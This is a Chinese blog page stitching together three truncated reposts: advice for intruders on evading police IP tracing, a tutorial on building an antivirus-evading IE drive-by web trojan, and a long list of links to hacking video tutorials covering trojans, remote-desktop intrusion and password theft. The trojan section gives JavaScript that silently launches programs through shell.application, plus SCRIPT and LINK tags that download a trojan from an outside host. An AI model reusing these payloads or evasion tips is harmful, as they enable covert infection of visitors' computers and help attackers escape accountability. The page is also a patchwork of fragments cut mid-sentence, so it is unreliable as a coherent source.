碧雪的博客网

入侵者必读,不读必死！
转自某位大哥！留个底，以后好学习，大家要学入侵的就必须看，重点！不要一味的就学怎么入侵，同时还要学会怎么保护自己！现在那么多人收服务器或许就是这个原因！

俗语有云：天网恢恢、疏而不漏！这句话是真的么？现实社会中我不知道。但是在互联网上，这句话在Internet上是很软弱的。读完我这篇文，就可以知道。在网络上触犯现行法律，即便于公安部门立案调查，未必就“落入法网” 注：本文仅做技术研讨，并非讨论如何在犯罪后逃脱法律的惩罚。

首先来认识一下：“网监”也就是公安部门分管网络的部门。他们负责网络监管，如网站和服务器被黑、游戏帐号装备被盗、网络上的各种纠纷、色情`反现zhengfu的内容。都属于网监处理。

我们来假设一个案例：163.com主站被入侵，服务器硬盘全部多次格式化，并且重复读写垃圾数据，导致硬盘数据无法进行恢复，损失惨重。于是在召集专家紧急修复服务器数据的同时，163.COM公司迅速向广州网监报案。广州网监介入调查，追踪此次入侵者！

如果你是入侵者，你面对这样的情况。你会怎么办？其实很多同行在侵入别人网站、服务器、内部网络的同时，都不太懂得如何保护自己。如果你们不注意隐藏自己，用不了一天，网监部门就可以锁定你家祖宗十八代-_-!!!，如果隐藏的好，等这个案子过了法律追究期限，也是个无头案。而这，在Internet上来说，是易如反掌！

首先，我们来了解下`网监部门如何追踪入侵者，锁定他在何处作案。大家一般都知道，当你黑掉一个网站的时候，你在WEB的操作。都会或多或少的被记录在对方WEB服务器日志上。IIS和Apache都是会记录一些IIS日志。如果你入侵一家网站，被记录下IP地址一点也不奇怪。就算一般浏览网站，也会被记录下IP，当你在浏览网站执行一个操作的时候，IIS服务器就会进行一次记录，比如说发生一次连接错误。这就更不谈你侵入他人网站会不会留下IP记录，这是绝对会留下的。

当你侵入一台服务器呢？在你进入服务器的时候，首先WINDOWS系统就会对你的连接IP进行记录，其次在网关服务器上。也会记录连接进入服务器的IP。所以即便于你能够把服务器上的记录给删除，而网关上的记录，你永远也碰不到。

公安部门在锁定做案者的时候，首先就是要找到做案者，如何找到？最重要的就是追踪IP了。

我们来了解下一些ADSL宽带接入常识。

众所周知，现在大家一般都是使用的ADSL电信或者网通的宽带接入网络。绝大部分是使用的动态IP，少部分是使用的固定IP。固定IP是特性一般是带宽在4M以上。而一般人用不了。当你启动计算机，通过ISP提供给你的宽带ADSL帐号拨进互联网的时候。ISP服务商的系统就会随机分配给你一个动态IP，并且记录如下事件，例如：2008年8月8日8时8分8秒，btm4545455（宽带帐号）,拨入IP：58.53.1.5，操作系统： Windowsxp，拨号电话：07284544562。各省的电信记录方式可能不同，但是这些数据绝对会被ISP记录下来，有的人可能不相信ISP会记录这么详细的内容。不过我进入电信网络中查看过这种系统，确实存在！而且更详细，我这里只是简单列举了他记录的一些主要数据！

另外一点，当你成功拨号进入互联网后，你的IP在访问互联网的时候，会经过不少路由器，几乎每个路由器都会记录下你的IP！

现在大家知道了ISP服务商通过什么方式记录你的行踪了吧？

我们再谈谈公安部门如何抓捕做案者。大家都知道，要抓一个人，首先就要知道他是谁、他在那里。如果这都不知道，怎么抓？而要获取到作案者地理位置和真实身份的唯一手段，就是“IP”，IP就是ISP分配给大家用来上网的东东。大家都知道，当你的计算机和一台Internet上的服务器建立连接的时候，双方就会互相传输数据给对方。而这个IP就等于是传输的通道，其实你使用的IP，只能说是互联网的“身份证”，真正访问互联网资源的其实是ISP，你的IP只是负责接受和传输数据到XX服务器。同样，这个IP就是确认某台计算机在某年某月某日某时某分某秒连接进入某个网络的证明。同样只有找到这台作案的计算机，才能继续追查他的使用者。

好的，我们现在回到前面，我们前面说了，假设163.COM公司报案后，公安部门通过分析，在WEB服务器系统上以及网关上面（无法擦去）均找到了连接并入侵系统的IP地址：211.1.1.1，这个时候公安部门调查发现，这个IP是来自日本的。这就是说`入侵者是日本人？这其实只是一个假象。

当查找一个入侵者的时候，很重要的一个环节就是查路由日志，大家都知道，当你的IP访问一台服务器的时候，就会经过非常多的路由器，也就是说不只一台路由记录了你曾经到访过的IP，这也是可以追查到的。同样，即使你使用国外肉鸡来连接入侵163.COM，公安叔叔同样会追查到你。那他们是如何做到的？

答案很简单，公安部门是有权利要求电信部门配合，提供路由日志，具体提供到有那些IP曾经路由到211.1.1.1这个IP上面，这样。就可以抓住你了。当你被抓的时候，别想`为什么劳资明明用了代理，还是被抓？其实很简单，因为单单是一层，那是很容易被破解的，尤其是代理！代理协议都是很简单的。被破译一点也不难。

大家都知道，公

打造完美的ＩＥ网页木马 icyfox

（测试页面:http://www.godog.y365.com/runexe/icyfox.htm，此处所运行的程序不是木马！)

　　既然要打造完美的ＩＥ网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：
　　一：可以躲过杀毒软件的追杀；
　　二：可以避开网络防火墙的报警；
　　三：能够适用于多数的ＷＩＮＤＯＷＳ操作系统（主要包括ＷＩＮ９８、ＷＩＮＭＥ、ＷＩＮ２０００、ＷＩＮＸＰ、ＷＩＮ２００３）中的多数ＩＥ版本（主要包括ＩＥ５．０、ＩＥ５．５、ＩＥ６．０），最好能打倒ＳＰ补丁；
　　四：让浏览者不容易发觉ＩＥ变化，即可以悄无声息，从而可以长久不被发现。
　　（注意以上四点只是指网页本身而言，但不包括你的木马程序，也就是说我们的网页木马只是负责运行指定的木马程序，至于你的木马程序的好坏只有你自己去选择啦！别找我要，我不会写的哦！）
　　满足以上四点我想才可以让你的马儿更青春更长久，跑的更欢更快……
　　看了上面的几点你是不是心动拉？别急，我们还是先侃侃现有的各种ＩＥ网页木马的不足吧！
　　第一种：利用古老的MIME漏洞的ＩＥ网页木马
　　这种木马现在还在流行，但因为此漏洞太过古老且适用的ＩＥ版本较少，而当时影响又太大，补丁差不多都补上啦，因此这种木马的种植成功率比较低。
　　第二种：利用com.ms.activeX.ActiveXComponent漏洞，结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马
　　虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数ＩＥ版本中，是一个比较好的漏洞，利用价值非常高，但却因为它结合了流行的病毒调用的ＷＳＨ及ＦＳＯ控件，使其虽说可以避开网络防火墙的报警，可逃不脱杀毒软件的追捕（如诺顿）。
　　第三种：利用OBJECT对象类型确认漏洞（Ｏｂｊｅｃｔ　Ｄａｔａ　Ｒｅｍｏｔｅ）并结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马（典型的代表有动鲨网页木马生成器）
　　此种木马最大的优点是适应的ＩＥ版本多，且漏洞较新，但却有如下不足：
　　１、因为此漏洞要调用Mshta.exe来访问网络下载木马程序，所以会引起防火墙报警（如天网防火墙）；
　　２、如果此ＩＥ网页木马又利用了ＷＳＨ及ＦＳＯ控件，同样逃不脱杀毒软件的追捕（如诺顿），而
动鲨网页木马又恰恰使用了ＷＳＨ及ＦＳＯ控件，叹口气……可惜呀……？
　　３、再有就是这个漏洞需要网页服务器支持动态网页如ＡＳＰ、ＪＳＰ、ＣＧＩ等，这就影响了它的发挥，毕竟现在的免费稳定的动态网页空间是少之又少；虽说此漏洞也可利用邮件ＭＩＭＥ的形式（见我在安全焦点上发表的文章：《由错误MIME漏洞的利用想到的......---IE Object Data 数据远程执行漏洞的利用》http://www.xfocus.net/articles/200309/607.html）来利用，但经测试发现对ＩＥ６．０不起作用。
　　看到上面的分析你是不是有了这种感觉：千军易得，一将难求，马儿成群，奈何千里马难寻！别急，下面让我带这大家一起打造我心中的完美ＩＥ网页木马。
　　首先要躲过杀毒软件的追杀，我们就不能利用ＷＳＨ和ＦＳＯ控件，因为只要利用了ＷＳＨ和ＦＳＯ控件就一定逃不脱“诺顿”的追杀，这可叫我们该如何是好？！别急，经过我的努力工作（说真的我也是在研究ＡＳＰ木马时偶然发现的灵感）终于我有找到了一个可以用的控件，那就是 shell.application，并且它可是经过了安全认证的，可以在“我的电脑”域中的网页中畅通无阻的执行，比ＷＳＨ和ＦＳＯ更容易得到执行权限（利用跨域漏洞即可），请看下面javascript代码：
<SCRIPT LANGUAGE="javascript" type="text/javascript">
var shell=new ActiveXObject("shell.application");
shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb();
</SCRIPT>
保存为test.htm后打开看是否自动打开了记事本程序，而且不会象ＷＳＨ和ＦＳＯ那样出现是否允许运行的提示框，是不是有点兴趣啦？现在我们已可以运行所有已知路径的程序，但我们要求运行我们自己的木马程序，所以还要求把我们的木马程序下载到浏览者的电脑上并找出它的位置。我们一个个来解决：
　　１、下载木马程序到浏览者的电脑中
　　这一点可以有很多解决方法，比如我以前提到的ＷＩＮＤＯＷＳ帮助文件访问协议下载任意文件漏洞（its:），不过这次我们不用它，再教大家两个更好的下载方法：
　　例一：利用SCRIPT标签，代码如下：
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>
注意此处的LANGUAGE属性可以为除javascript、VBScript、JScript以外的字符串,也可以是汉字，至于src的属性当然是你的木马程序的地址啦！因为现在免费空间出于安全考虑，多数不允许上传exe文件，我们可以变通一下把扩展名exe改为bat或pif、scr、com，同样可以运行。
　　例二：利用LINK标签，代码如下：
<LINK href="http://www.godog.y365.com/wodemuma/icyfox.bat" rel=stylesheet type=text/css>
把代码放在标签<HEAD></HEAD>中间，href属性值为

IP攻击动画演示
http://www.77169.com/Article_Show.asp?ArticleID=716
3389利用动画片
http://www.77169.com/Article_Show.asp?ArticleID=605
SQL入侵
http://www.77169.com/Article_Show.asp?ArticleID=627
sss
http://www.77169.com/Article_Show.asp?ArticleID=674
svchost(一个木马的动画教学)
http://www.77169.com/Article_Show.asp?ArticleID=673
如何设置代理跳板
http://www.77169.com/Article_Show.asp?ArticleID=652
网页木马email制作http://www.77169.com/Article_Show.asp?ArticleID=651
流光使用
http://www.77169.com/Article_Show.asp?ArticleID=632
入侵动画1http://www.77169.com/Article_Show.asp?ArticleID=628
入侵动画1http://www.77169.com/Article_Show.asp?ArticleID=629
idq攻http://www.77169.com/Article_Show.asp?ArticleID=607
Psniffer嗅探工具
http://www.77169.com/Article_Show.asp?ArticleID=606
美国街道现场直mms://65.200.140.51/lennon
好多的动画教程呀！
利用天网查QQ隐身好友IP地址动画http://www.chinesehack.org/down/show.asp?id=3725&down=1

破解入门教学演示：
http://www.chinesehack.org/down/show.asp?id=3721&down=1

通过Radmin获取Admin密码动画：
http://www.chinesehack.org/down/show.asp?id=3720&down=1

4899动画入侵教程：
http://www.chinesehack.org/down/show.asp?id=3719&down=1

动网logout.asp漏洞利用动画教程：
http://www.chinesehack.org/down/show.asp?id=3641&down=1

动网logout.asp漏洞利用动画教程（另一则） http://www.chinesehack.org/down/show.asp?id=3644&down=1

ftp断点续传教程 ：
http://www.jk520.com/jkxz/show.asp?id=1220&down=1

接踵而至的LB5K论坛漏洞入侵检测动画演示 ：http://www.chinesehack.org/down/show.asp?id=3585&down=1

remote-trial使用动画教程：
http://www.chinesehack.org/down/show.asp?id=3594&down=1

远程开3389 ：http://www.xren.net/down/show.asp?id=1252&down=1

网页抓HASH动画 ：http://81.heibai.net:81/download/show.php?id=3715&down=2

木马使用动画全教程：http://81.heibai.net:81/download/show.php?id=3714&down=2

如何利用文件夹安装木马的动画教程http://81.heibai.net:81/download/show.php?id=3486&down=2

在肉鸡上建立web服务器支持cgi、php、mysql的动画教程：
http://81.heibai.net:81/download/show.php?id=3423&down=2

教你隐藏OICQ的IP（动画教程）http://www.51299.com/ruan/shu/2003/02/10/oicqsocks5.rar

魔法控制1.6（动画教程）
http://www.51299.com/ruan/shu/2003/02/10/mofa.rar

网络隐身（动画教程）
http://www.51299.com/ruan/shu/2003/01/11/sock.rar

1月11日发现的美萍卫士漏洞使用（动画教程）http://www.51299.com/ruan/shu/2003/01/12/mpld01.zip

获取其他帐户密码（动画教程）http://www.51299.com/ruan/shu/2003/01/11/findpass.zip

登陆密码破解应用教程（动画教程http://www.51299.com/ruan/shu/2003/01/11/nt.zip

MYSQL攻防篇（动画教程）http://www.51299.com/ruan/shu/2003/01/11/mysql.zip

申请QQ全攻略动画http://menet.eoa.net.cn/home/yifeng1984/download/dlqq.rar

telnet代理使用方法动画教程http://www.chinesehack.org/down/show.asp?id=3634&down=1

打造菜鸟的网页木马动画教材http://www.chinesehack.org/down/show.asp?id=3633&down=1

入侵交友网站动画演示http://www.chinesehack.org/down/show.asp?id=3632&down=1

windows超长目录漏洞利用动画http://www.chinesehack.org/down/show.asp?id=3627&down=1

psexec使用演示http://www.chinesehack.org/down/show.asp?id=3600&down=1

shed＋pqwak2破解98密码动画演示http://www.chinesehack.org/down/show.asp?id=3598&down=1

一个黑客小游戏过关全攻略动画演示http://www.chinesehack.org/down/show.asp?id=3595&down=1

remote-trial的使用方法动画演示http://www.chinesehack.org/down/show.asp?id=3594&down=1

WINNTAutoAttack 2.6+简单使用教程http://www.chinesehack.org/down/show.asp?id=3567&down=1

台湾反弹木马简体版+动画教程http://www.chinesehack.org/down/show.asp?id=3365&down=1

后门SRV（含动画教程）http://www.chinesehack.org/down/show.asp?id=3358&down=1

数据通XP v2.5 破解动画http://www.chinesehack.org/down/show.asp?id=3124&down=1

扫描路由器动画教程http://www.chinesehack.org/down/show.asp?id=3098&down=1

SOCKS5代理制作教程
http://www.ststst.com/down/down.asp?downid=1&id=910
解压密http://www.cycycy.net
用被禁用的guest账号登陆动画教程
http://www.ststst.com/down/down.asp?downid=1&id=909
解压密http://www.cycycy.